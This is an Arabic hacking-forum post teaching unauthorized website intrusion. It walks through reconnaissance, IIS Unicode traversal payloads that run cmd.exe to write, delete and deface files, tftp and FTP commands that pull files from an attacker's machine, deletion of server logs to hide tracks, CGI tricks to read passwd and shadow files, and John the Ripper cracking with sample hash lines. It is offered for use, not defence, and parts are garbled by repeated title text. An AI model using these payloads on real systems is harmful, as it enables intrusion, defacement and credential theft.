موضوووع مهم جدا جدا في إختراق المواقع من أخوكم M A T R I X

نقاط : 0 تاريخ التسجيل : 01/01/1970

السلام عليكم ورحمة الله وبركاته

الموضوع طويل وانصحك انك تفصل النت وتجلس على راحتك تقرا

سلام هذه أول مشاركة لي بهذا المنتدى وده موضوووع مهم جدا إن شاء الله يعجبّكم
وبسم الله نبدأ
*****************

الإختراق ماهو ؟
هو ان تدخل اي مكان سواء موقع او ايميل او حتى جهاز شخصي وانت ليس لك صلاحية الدخول
والاختراق ليس صعباً كما يتصور البعض (وانا اقول انه حتى الشات صعبة اذا ماتمرست عليها
وشفت كيفية عملها ) يعني لازم تتعلم وتطور نفسك ماهو تجلس كذا وتقول عجزت اذا انت عجّاز
وكسول انا اقولك اطلع من الحين لان الإختراق يتطور مع تطور الكمبيوتر ولابتظل على السب سفن
المهم لازم تطور نفسك وتتعلم .
بتقولي اذا بغيت اخترق لازم اتعلم لغات البرمجة...!!!
اقولك هو صحيح لكن تعلم بسيط مو ملم بكل شي يعني اتعلم كيف تسوي كمبايل
(الكمبايل هو تحويل البرنامج من تعليمات واوامر الى برنامج تطبيقي exe )
كيف تعرّف المتغيرات بس ...
واللي وده يتعلم البرمجه انا انصحه في السي هي ام لغات البرمجه وصدقني جميع لغات
البرمجة تتشابة الى حد كبيييييير الاختلاف بس يكون في طريقة تعريف المتغيرات .

كل اللي راح مجرد مقبلات طيب ألحين نبدأ في الدسم .

ودي اخترق موقع وش اول خطوه ؟
اول خطوه يالغالي اعرف الدومين الخاص في الموقع Smile

(طبعاً انت عارفه)
طبعا لازم تعرف الآي بي الخاص في الموقع كيف ؟
شوف الرسم >>>>
إبدأ (start) >>> تشغيل (Run) >>> اكتب في المربع command >>> موافق(OK)
راح تطلعلك نافذة دوس عاديه اكتب اللي بين الأقواس (ping [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط])
لاحظ المسافة الموجودة بين ping وعنوان الموقع ولازم تكتب [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
راح يكتبلك كلام كثير وآي بيات <<<< Smile

حلوه آي بيات
المهم لاحظ اول سطر بعد اللي كتبته في قوسين مربعة بالصوره هذي
[xxx.xxx.xxx.xxx] <<<< مسكناه هذا هو الآي بي حق الموقع اللي بنلعن أبوه
اكتبه على جنب عندك
فيه اي بيات كثيره تحت ماعلينا منها

طيب عرفنا الآي بي وش اللي بعد كذا؟
قلتلي وش بعد ... نروح بعدها لأي برنامج سكان وافضلها SuperScan
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
بتقولي كيف استخدم SuperScan ؟ بقولك ماهو موضوعنا وعلى العموم هوبرنامج سهل راح
تفهمه بسرعه .

طيب ليه نحطه الآي بي في السوبر سكان ؟ وش الفيده منه؟
نحط الآي بي لأن الـSuperScan مايقبل دومين وفايدته علشان تعرف البورتات المفتوحه
في الموقع .

نفرض اننا حصلنا في مثالنا اللي قبل شوي ان البورتات المفتوحه هي
(21 - 23 - 25 - 37 - 110 - 139)
21 << يدل على ان الموقع يوجد به خدمة الـFTP
23 << يدل على ان الموقع يوجد فيه خدمة الـTelnet
25,110 << يدل على ان الموقع فيه خدمة ارسال واستقبال البريد اي (smtp و pop )
139 << منفذ النت بيوس وهذا نادراً ماتحصله لكن اختراق المواقع اللي على سيرفر
اللي البورت هذا فيه مفتوح اسهل من شرب الماء <<< ويقولون الإختراق صعب
بتعرف كيف تدخل عن طريق البورت هذا انصحك تشوف موضوع كتبته عنوانه
(الإختراق عن طريق الويندوز ...يعني بدون برامج)

طيب لو بغيت اعرف معلومات اكثر عن الموقع ؟
لو بغيت مثلاً تعرف من صاحب الموقع او الشركة التي تستضيف الموقع وأكثر من ذلك
ماعليك الا الإستعانه بخدمة Whois وهذي موجودة كبرامج سي جي آي على المواقع خذ مثلاَ :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

طيب وش بعد كذا ؟
قبل ماأقولكم وش بعد كذا وش رايكم في شي يختصر عليك كللللللل كلامنا اللي راح
لا وبعد يعطيك نظام التشغيل ونوع السيرفر (وهذا هو المهم) واكثر من كذا بعد
ادخل الموقع هذا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
دخل الدومين في المربع بدون ماتكتب [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] واضغط على الزر
بيعرضلك كل شي عن الموقع من الآي بي حتى نوع السيرفر

هنا تفترق الطرق ؟؟
ركز في نوع السيرفر اذا كان
Apache او IIS
Apache << قام على تصميمة مجموعة مبرمجين من أنحاء العالم ولذلك هو قوي جداً
IIS << قامت على تصميمه عملاقة البرمجيات مايكروسوفت يعني مايحتاج اقول كله
بلااااوي
واللي غريب في الموضوع ان مايكروسوفت اللي طلعتلنا IIS موقعها شغال على الأباتشي
<<< والله مهزله

طيب اذا كان IIS على طول عليك بثغرة اليوني كود .

وش اليونيكود بعد ؟
انا راح اتركم مع شرح اخوي هكس مشرف منتدى الحلم لأنه في اعتقادي مستحيل احد يشرح
زيه لثغرات اليونيكود .

************************************************** *************************

يحتوى الدرس الاول على ( 13 نقطة ) وهي كما يلي :-
- تعريف باليونيكود .
- تاريخ ظهور هذه الثغرة .
- كيفية ايجاد هذه الثغرات .
- كيف يتم استغلال ثغرات اليونكود .
- الاوامر المستخدمة بواسطة ملف CMD .
- طريقة تطبيق هذه الثغرات .
- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
- طريقة نسخ ملف الـ CMD لاتاحة امكانية الكتابة على الملفات .
- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
- كيفية عمل اكاونت للدخول بواسطة الـFTP .
- طريقة كشف باسورد الادمينستريتور .
- تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
- مسح ملفات اللوق حتى لا يتم التعرف عليك .

- تعريف باليونيكود .
اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع IIS4.0 / IIS5.0 والذي ياتي عادة مع NT4 / Win2k .

- تاريخ ظهور هذه الثغرة .
لايوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص
مجهول anonymous person ، وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة
الصينين ولكن لايوجد مايثبت صحة هذا الكلام لهذه الثغرات ، فتم استغلال هذه
الثغرات من قبل المخترقين وتطوير البرامج اللازمة لها .

- كيفية ايجاد هذه الثغرات .
يتم ايجاد هذه الثغرات بطريقتين :-
1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي
تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
2- بواسطة تطبيق الثغرة على الموقع مباشرة .

- كيف يتم استغلال ثغرات اليونكود .
عند تطبيق الثغرة على نظام الـ IIS4 / IIS5 يبدا ملف CMDبفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها .

- الاوامر المستخدمة بواسطة ملف CMD .
الاوامر المستخدمه بواسطة ملف الـCMD وهي امر لانشاء دليل جديد وامر لالغاء
دليل وامر النسخ وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر
لرؤية محتويات الملف وامر الكتابة داخل أي ملف وامر لسحب أي ملف ، وهي حسب
الامثلة التالية :-
امر انشاء دليل جديد: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

امر الغاء دليل: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
للمعلومية:لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات

الامر المستخدم للنسخ:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

الامر المستخدم للنقل:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

الامر المستخدم للحذف: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

الامر المستخدم لتغيير مسمى الملفات: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

الامر المستخدم لرؤية محتويات الملف: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

الامر المستخدم للكتابة داخل أي ملف:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] 2/cmd.exe?/c+echo+sNiper_hEx+>c:\hEx.txt

الامر المستخدم لعملية سحب أي ملف:
عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

- طريقة تطبيق هذه الثغرات .
تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] +c:\
وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin

- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه الثغرة :-
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

فنحتاج الى نسخ ملف w3svc.exe الى مجلد inetpub\scripts والامر يكون بهذه الطريقة :-
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

بعد نسخ ملف w3svc.exe الى مجلد inetpub\scripts ، الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة :-
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل
inetpub\wwwroot\index.htm بحيث يكون الامر بالشكل التالي :-
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ed+By+sNiper_hEx+hExRay@Hotmail.com+>+c:\inetpub\w wwroot\index.htm

- طريقة نسخ ملف الـCMD لاتاحة امكانية الكتابة على الملفات .
الغرض من نسخ ملف الـCMD وهو لاعطاء امكانية للكتابة داخل السيرفر في بعض الحالات ويتم نسخه الى مجلد السيكربت بهذه الطريقة :-
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الان بامكاننا استخدام ملف الـCMD الجديد في الثغرة بدلا من الاول بهذا الشكل :-
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
تتم معرفة مشكلة الـAccess Denied من خلال المحاولة في حذف أي ملف من أي
امتداد ، فعند ظهور رسالة الـ Access Denied فاليك هذه الطرق حتى تتمكن من
الكتابة على الملفات والتحكم اكثر على السيرفر :-
1- الطريقة الاولى نسخ ملف الـ CMD الى دليل السيكربت بمسمى CMD1 فسوف يتاح
لك امكانية الكتابة باستخدام الامر Copy باستخدام هذا الامر :-
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
2- الطريقة الثانية بالتعامل مع الملف ssinc.dll والطريقة كما يلي :-
o اولا انشاء صفحة باسم test.shtml
o تكون هذه الصفحة داخل مجلد wwwroot/hEx/test.shtml
o كتابة هذا الكود داخل الصفحة  بحيث ان حرف A يتم كتابتة حتى يتعدى 2049 حرف .
o الان يتم طلب الصفحة من خلال المتصفح [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
o الان سوف تظهر لك الصفحة .
o الان تستطيع الكتابه وتم تخطي مشكلة الـAccess Denied .
o اذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .
3- الطريقة الثالثة باستخدام برنامج NC.exe بحيث يتم عمل اب لوود لهذا
الملف داخل مجلد الـTemp في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال
موجة الدوز وللمعلومية مجلد الـTemp مفتوح لعمليات الاب لوود .
4- الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .
5- البحث عن ملفات : root.exe ،6- sensepost.exe ،7- shell.exe ،8-
w3svc.exe ونسخها الى مجلد c:\inetpub\scripts وتطبيق الثغرة من خلالها .

- كيفية عمل اكاونت للدخول بواسطة الـFTP .
1- نسخ ملف CMD الى مجلد Scripts باسم Shell.exe حتى يتم الاستفادة من ثغرة قديمة
/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scrip ts\shell.exe
2- انشاء ملف mspft.pll بواسطة الامر Echo وكتابة فيه التالي open [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] حيث ان هذا هو الخادم للـFTP .
/c+echo+open+[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
3- الان مطلوب اضافة مجهول Anonymous الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl
4- الان مطلوب ادراج البريد [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\msp ft.ppl
5- إضافة User قبل Anonymous لزوم الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspf t.ppl
6- الان تكرار لحاجة الاعداد
/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\msp ft.ppl
7- يتم هنا ادراج الموقع الحالي للملفات
/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\wi nnt\mspft.ppl
8- الان يكتب اوامر الـFTP اللازمة لسحب الملف من خادم الـFTP وهي Get index.htm ثم يدرج هنا بدون المسج السابق
/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspf t.ppl
9- هنا نفس السابق ولكن باضافة Quit
/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl
10- الان يتم تنفيذ امر [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] وهو عبارة عن
خطوات قمنا بانشاءها وموجودة في ملف mspft.ppl باحتوائها على مايلي :-
- Open [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
- Anonymous
- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
- User Anonymous
- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
- Get index.html
- Quit

/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.ex e?+"-s:c:\winnt\mspft.ppl"

- - طريقة كشف باسورد الادمينستريتور .
نحتاج الى وجود برنامجين ( Microsoft Access – L0phtCrack ) وهي لزوم تنفيذ بعض الخطوات لتالية وهي :-
- باسورد الادمينستيتور للسيرفر يكون موجود في ملف الـ SAM._ في دليل
\winnt\repair\ وافضل برنامج لفك شفرة الباسورد هو برنامج L0phtCrack كما
هو موضح بالشكل التالي:-

- اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف
تكون في ملف PASSFILT.DLL ونستطيع تحديد مسار هذا الملف من خلال الريجستري
بواسطة هذا المفتاح :-
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Lsa\SYSTEM32\PASSFILT.DLL

- اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ASP للوصول الى
البيانات من خلال قاعدة الـ MySQL فسوف نحتاج الى تطبيق ثغرة ( +.htr )
للوصول الى باسورد المسئول عن هذة القاعده وهي كالتالي :-
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت
التنفيذ فالطريقة صحيحة وماعلينا فقط سوى سحب ملف database.inc وقراءة
محتوياته للعثور على اسم المستخدم والباسورد للمسئول عن قاعدة البيانات .

- تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
1- قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ c:\
2- قم بتشغيل برنامج TFTP ونفذ الامر في الفقرة التالية .

/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm

tftp.exe وهو البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر
"-i" وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات
1.1.1.1 رقم الايبي الخاص بك
GET وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال
index.htm اسم الملف بجهازك
\inetpub\wwwroot\ اسم الدليل في السيرفر
index.htm اسم الملف على السيرفر

- مسح ملفات اللوق حتى لا يتم التعرف عليك .
وتتم هذه العملية من خلال حذف ملفات الـ Log من مجلد System32 بواسطة الامر :-
/c+del+c:/winnt/system32/logfiles/*.log

****************** انتهى كلام هكس**************************

خلونا ننقز تحت
بس شوي شوي لاتنكسرون لووووووووووول

--------------------------------------------------------------------------------

كلكم سالمين ماأحد انكسر خاطره خخخخخخخخ
حمد لله

**** ياشباب هنا والله اكثر من خمس مرات اشيل خاصية الرموز والسمايل وماهي راضيه تنشال
يعني راح تشوفون رموز ابتسامات او زي كذا في غير مكانها
علشان كذا اي رمز يكون في غير مكانه يعني مثلا ابتسامه داخل دومين
شلها وحط مكانها الإختصار الخاص في الرمز هذا
على العموم الدرس مرفق كملف تكست انصح انكم تنزلونه
+++++++++++++++++++++++

طيب نكمل كلامنا

طيب الحين زي ماشفنا انها ثغره سهله وكل شي فيها يتم عن طريق المتصفح والثغرات
اللي تتم عن طريق المتصفح كثيره وسهله يقدر يسويها اي واحد.
فيه ثغرات غير كذا يكون الإستثمار (Exploit ) عن طريق كود مكتوب بالسي او البيرل
او حتى shell لليونكس او bat للويندوز بس انت تنفذها طبعا لازم تكون فاهم شوي
في البرمجه حتى تقدر تتعامل مع الأكواد هذي.
فيه اختراق صعب وللخبراء اللي هو اكتشاف ثغرات جديده ماسبق واكتشفت وهذا اظن
اللي يقدرون عليه عندنا معدودين على الأصابع .
هذا كله ماهو موضوعنا موضوعنا اسهل شي اللي هو ثغرات المتصفح .
( انا راح ارفق ملف فيه اكثر من 6000 ثغره عن طريق المتصفح ماعليك الا تفتح اي برنامج
سكان زي برنامج عمران - هو برنامج سهل وسريع مرررره- بعدين دخل اسم الموقع
واضغط سكان وشوف الثغرات اللي بتلاقيها .... منت مصدق نفس من كثر الثغرات)

طيب ثغرات السي جي آي كيف طريقتها؟
ثغرات السي جي آي موجوده في اغلب المواقع ولو مثلا صادلنا برنامج عمران ثغره اسمها
webspirs.cgi

وش نسويبها ؟
نرجع لمثالنا اللي قبل شوي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] <<< بخليه يكره حياته اليوم Smile

نكتب في المتصفح
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
<<< شفتوا كيف سهله وتصدق انك راح تخش على الباسوورد ترانزيت
لاحظ ان اسم ثغرتنا اللي حصلناها موجود بعد مجلد السي جي آي وهذا متغير
من ثغره الى ثانيه.
طيب هذا كله ليه ؟
هذا يالغالين علشان ملف الباسوورد وهذا يختلف من سيرفر الى آخر في مثالنا
كان اسمه passwd في مجلد etc واللي فيه بيانات جميع اللي لهم صلاحيات على السيرفر

الحين حصلنا ملف الباسوورد وش نسوي ؟
ممكن يكون ملف الباسوورد مشفر او مضلل.

طيب كيف اقدر افرق بينهم؟
root:RfT1sTK3mrUL6:0:1:Super-User:/:/sbin/sh
هنا يكون مشفر خلونا ناخذه خطوه خطوه ...
root المستخدم
RfT1sTK3mrUL6 هذي كلمة السر
0 هذا رقم المستخدم
1 رقم المجموعه
Super-User:/:/sbin/sh <<< ماله داعي

زي مانشوف كلمة السر مشفره ونوع التشفير هذا ضعيف جداً واللي يتكون من 13 حرف ممكن يستخدم
فيها حروف كبتل وسمول وارقام بدون رموز وهذا النوع تشفير خاص بلوينكس وانظمه اخرى
اما الويندوز طريقه تشفيره غير يدخل فيها الرموز بس ضعيف برضو , ماعلينا منهم

طيب حنا لقينا هنا الباسوورد لكن مشفر هذا هو الملف المشفر
خلونا نشوف المضلل
root:!:0:1:Super-User:/:/sbin/sh
لاحظتوا شي شوفو الباسوورد موجود مكانها علامة ! وهالعلامه ممكن تكون غير من ملف الى ملف
ممكن تكون * او X
وملف الباسوورد ممكن يكون مايتعدى عشرة اسطر وممكن يكون من آلاف الأسطر <<< يعني نفحط فيه

اذا كان مشفر وش اسوي ؟
اول شي احب اقول انه نادرا ماتلاقي ملف مشفر هذا اذا ماكان انقرض اصلا لووووووووول
على العموم راح اشرح كيف تفك التشفير بعد شوي

ألحين لازم نجيب ملف الشادو ... وشو ذا بعد ؟!!!!
ملف الشادو هذا تكون فيه كلمات المرور الأصليه ...
يعني لما يكون الملف مضلل ومكان كلمة السر علامه كيف اعرف الكلمة الأصليه راح احصلها
في ملف الشادو
اتمنى تكون اتضحت الصوره ......ياليت

طيب وين احصله؟
هي تختلف من نظام الى آخر
طبعا الغالب في اكثر الأنظمة يكون هنا
راح تحصله هنا etc/shadow يعني في مثالنا اللي قبل شوي اللي شرحنا ثغرة السي جي آي
وكيف نحصل ملف الباسوورد كانت الثغره
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ألحين نبي الشادو نحط بس
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
بقوللكم ألحين أماكن تواجد الشادو
/etc/shadow
/etc/security/passwd.adjunct
/etc/passwd.dir
/etc/passwd.pag
/etc/shadow
/.secure/etc/passwd
/etc/shadow
/etc/tcb/aa/user
/etc/shadow
/etc/shadpw
/etc/master.passwd
scripts/passwd <<< ويندوز ان تي

طيب وش راح نحصل في ملف الشادو ؟
نحصل كلمات السر الصحيحه يعني ماهي علامات بس مشفره Sad

طيب كيف افك التشفير ؟
اولا اذا كان مضلل لازم ادمج ملف الباسوورد مع ملف الشادو
بتقولون كيف بقول على ماأعتقد فيه برنامج يدمج الملفين لكن انا اسويها يدويا
يعني تفتح ملف الشادو على جنب وتفتح ملف الباسوورد وكل رمز في ملف الباسوورد
تحط بدل منه كلمة السر اللي في ملف الشادو وبعد ماتنتهي من جميع كلمات السر
احفظ الملف باي اسم تبيه علشان نفك التشفير .

كيف نفك التشفير ؟
فيه برنامج اسمه John the Ripper هذي شغلته (اللي هي فك التشفير)

كيف استخدم البرنامج ؟
انا بقولك هذا اخوي X معاند اليهود X مقدم شرحه في منتدى الحلم صدقوني ماراح
اقدر اشرح احسن ....

***********************فك التشفير بواسطة John the Ripper******************************
تمهيد:
لاحظت خلال الفترة الماضية كثرة السؤال عن كيفية كسر كلمات السر المشفرة
ووووو ، ولاني لم ارى اي شخص قد قام بشرح البرنامج شرح كافي ووافي في
المنتديات (وهذه ليست مذمة لعلمي بوجود أناس خبراء به) لتكون مرجع لكل هكر
عربي فإني سأقوم بشرح هذا البرنامج العظيم وبالرغم من العناصر الكثير التي
سأتطرق لها إلا ان البرنامج حقيقة فيه امور كثير وكثيرة جداً وان قصرت في
جانب ارجوا ان تضيفوا على الشرح حتى يستفيد الجميع ،،،
مقدمة :
برنامج (John the Ripper) احد افضل البرامج لكسر كلمات السر التي يحصل
عليها المخترقون من الانظمة (nix*) ، وهذه الانظمة واخص الاصدارات الحديثة
توفر نظام حماية إضافي لملف (PASSWD) بان يكون مضلل وعلى المخترق الحصول
على ملف (SHADOW) لكي يحصل على ملف كلمات السر مشفرة ومن ثم يقوم بكسر هذا
التشفير . هذه هي الوظيفة الاساسية واعتبرها من اهم الخطوات في اختراق
الخوادم لانها تعطيك المفتاح .
مكان تنزيل البرنامج :
البرنامج متوفر في معظم المواقع وبنسخ ثلاث مايهمنا نظام التشغيل (ويندوز)
لان اغلب الاخوان يعملون على هذا النظام ويمكن تنزيلة من هذا الموقع :

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

او اي موقع تحب ان تنزل البرنامج منه .

طريقة عمل البرنامج :
البرنامج يعمل على الدوس وعلى افتراض والملف الذي نقوم بتشغيلة هو (john.exe) مثال:
c:\john
ثم انتر
بيظهر لك جميع الاوامر المستخدمة في البرنامج وخلاص انتهى الشرح ،،،،،، امزح معاكم.

الخيارات المستخدمة لكسر كلمات السر المشفرة في برنامج (John the Ripper)

1- امر يبحث لك عن الكلمات المحتملة من خلال قوائم بكلمات السر
(وهذه القوائم يتم إعدادها عن طريق برامج مخصصة لذلك مثل برنامج (DICTMAKE)
وبرنامج (Advanced Password Generatot) والكثير الكثير من البرامج او ان
نقوم بأحضار ملفات جاهزة ومعدة للأستخدام هذا من خلال نفس الموقع الذي
نزلنا منه البرنامج وهو للفائدة موقع امنى غاية في الروعة جميع ادوات الهكر
والمعلومات المفيدة والدروس .

2- امر يبحث لك عن الارقام فقط مثل
(1234567890).

3- امر يبحث عن الحروف الصغيرة مثل :
(zaqwsxcderfvbgtyhn)

4- امر يبحث لك عن جميع الاحتمالات الممكنة مثل :
(smcbtdpajrhflgSkwnMBeCTRJDAPLiKovH1WGNFIVEyzuOZ20 q!3984Y5xU67QX_#&(;@[^ "$%')*+,-./:<=>?\]`{|}~)

5- امر يبحث لك عن كلمات السر التي تكون مطابقة لاسم المستخدم مثل
اسم المستخدم (hex) وكلمة السر (hex)

-----------------------
1- امر يبحث لك عن الكلمات المحتملة من خلال قوائم بكلمات السر وصيغته كالتالي:

john -w:wordlist.txt passwd.txt

بحيث ان (wordlist.txt) هو ملف كلمات السر المحتملة و (passwd.txt) ملف كلمات السر الذي نريد كسره.
وعندما لايكون لدينا لاهذا ولا ذاك او ان كلمات السر المحتملة لم تكن من ضمن القوائم نلجاء إلى الطرق الاخرى

2-امر يبحث لك عن كلمات السر التي تكون مطابقة لاسم المستخدم وانا انصحك ان تبدأ بهذا الخيار لانه سريع جداً وصيغته:

john -single passwd.txt

3- امر يبحث لك عن الارقام فقط وصيغتة:

john -i:Digits passwd.txt

4- امر يبحث عن الحروف الصغيرة

john -i:Alpha passwd.txt

5- امر يبحث لك عن جميع الاحتمالات الممكنة وصيغتة:

john -i:all passwd.txt

هذا الامر الاخير مفيد عندما لاتنجح اي محاولة من المحاولات السابقة فهذا
بيكسرها بيكسرها - بأذن الله - لانه بيجرب جميع الاحتمالات.

-----------------------------------------------------------------
طيب بقي امور لابد من أيضاحها وهي :

هناك ملف اسمة (nohn.ini) هذا من فوائدة انك تستطيع ان تحدد طول كلمة السر
واطول احتمال واقصر احتمال ،عموما البرنامج اعداداته الافتراضية يبداء
بخانة وينتهي بثمانية خانات تستطيع تعديل هذه الخيارات من خلال الاسطر
التالية افتح الملف هناك أسطر :

[Incremental:Digits]
CharCount = 10
MinLen = 1
MaxLen = 8
CharsetB = 1203984567
CharsetM = 1203947685
CharsetE = 1253079846

طيب لاحظ (MinLen = 1) اي انه يبدأ من خانة واحدة تستطيع وضعها اثنان .
لاحظ كذلك (MaxLen = Cool

اي اقصى حد ثمانية خانات تستطيع زيادتها إنقاصها .
لكن شئ مهم عندما تعدل هذه الخيارات التي بالاعلى فلاحظ ماهو الامر التابع
لها انا الان عدلت الارقام (Digits) وعرفت ذلك من خلال السطر الاول
[Incremental:Digits]
كذلك باقي الاوامر (All) و(Alpha) الخ ،،

---------------------------------------------
كيف تعرف ان البرنامج قام بكسر كلمات السر ??
هناك طريقتان اما انها تظهر لك في الشاشة امامك او انك تقوم بفتح ملف اسمة (john.pot) هذا ستجد كلمة السر المشفرة وكسرها .
---------------------------------------------
كيف تستطيع كذلك ملاحظة سير البرنامج؟؟
من خلال الضغط على اي زر في لوحة المفاتيح وسترى جميع التخمينات لكسر هذه الكلمات المشفرة .
----------------------------------------------
كيف تستطيع ايقاف البرنامج ؟؟
من خلال الضغط على الزر (Ctrl) و(Shift) و(C) وللفائدة اذكرها للأخوان
الذين لايعلمون أغلب البرامج التي تعمل على الدوس تستطيع الخروج منها بهذه
الحركة .
----------------------------------------------
هل البرنامج لايعمل إلا على كسر هذا النوع من الملفات ؟؟
لا بل يستطيع كسر اغلب كلمات السر التي تكون مشفرة لانه يستخدم شفرة (DES)
وانواع اخرى حتى اني قرأت أخيراً ان البرنامج يقوم بكسر شفرة (md5) وانواع
اخرى للفائدة اذكرها مثل (BSDI) .
----------------------------------------------
هذا ملف سحبته من موقع تستطيع ان تعمل تمرين سريع عليها لتعرف مدى إلمامك بالدرس وتجربة إن لم يكن لديك ملف تتسلى عليه :

root1:2hm./ZzOzqt2s:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:* موضوووع مهم جدا جدا في إختراق المواقع من أخوكم M A T R I X 6

موضوووع مهم جدا جدا في إختراق المواقع من أخوكم M A T R I X 6

0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:ZIYBy4FO9.FmE:8:12:mail:/var/spool/mail:
news:* موضوووع مهم جدا جدا في إختراق المواقع من أخوكم M A T R I X 9

موضوووع مهم جدا جدا في إختراق المواقع من أخوكم M A T R I X 9

13:news:/usr/lib/news:
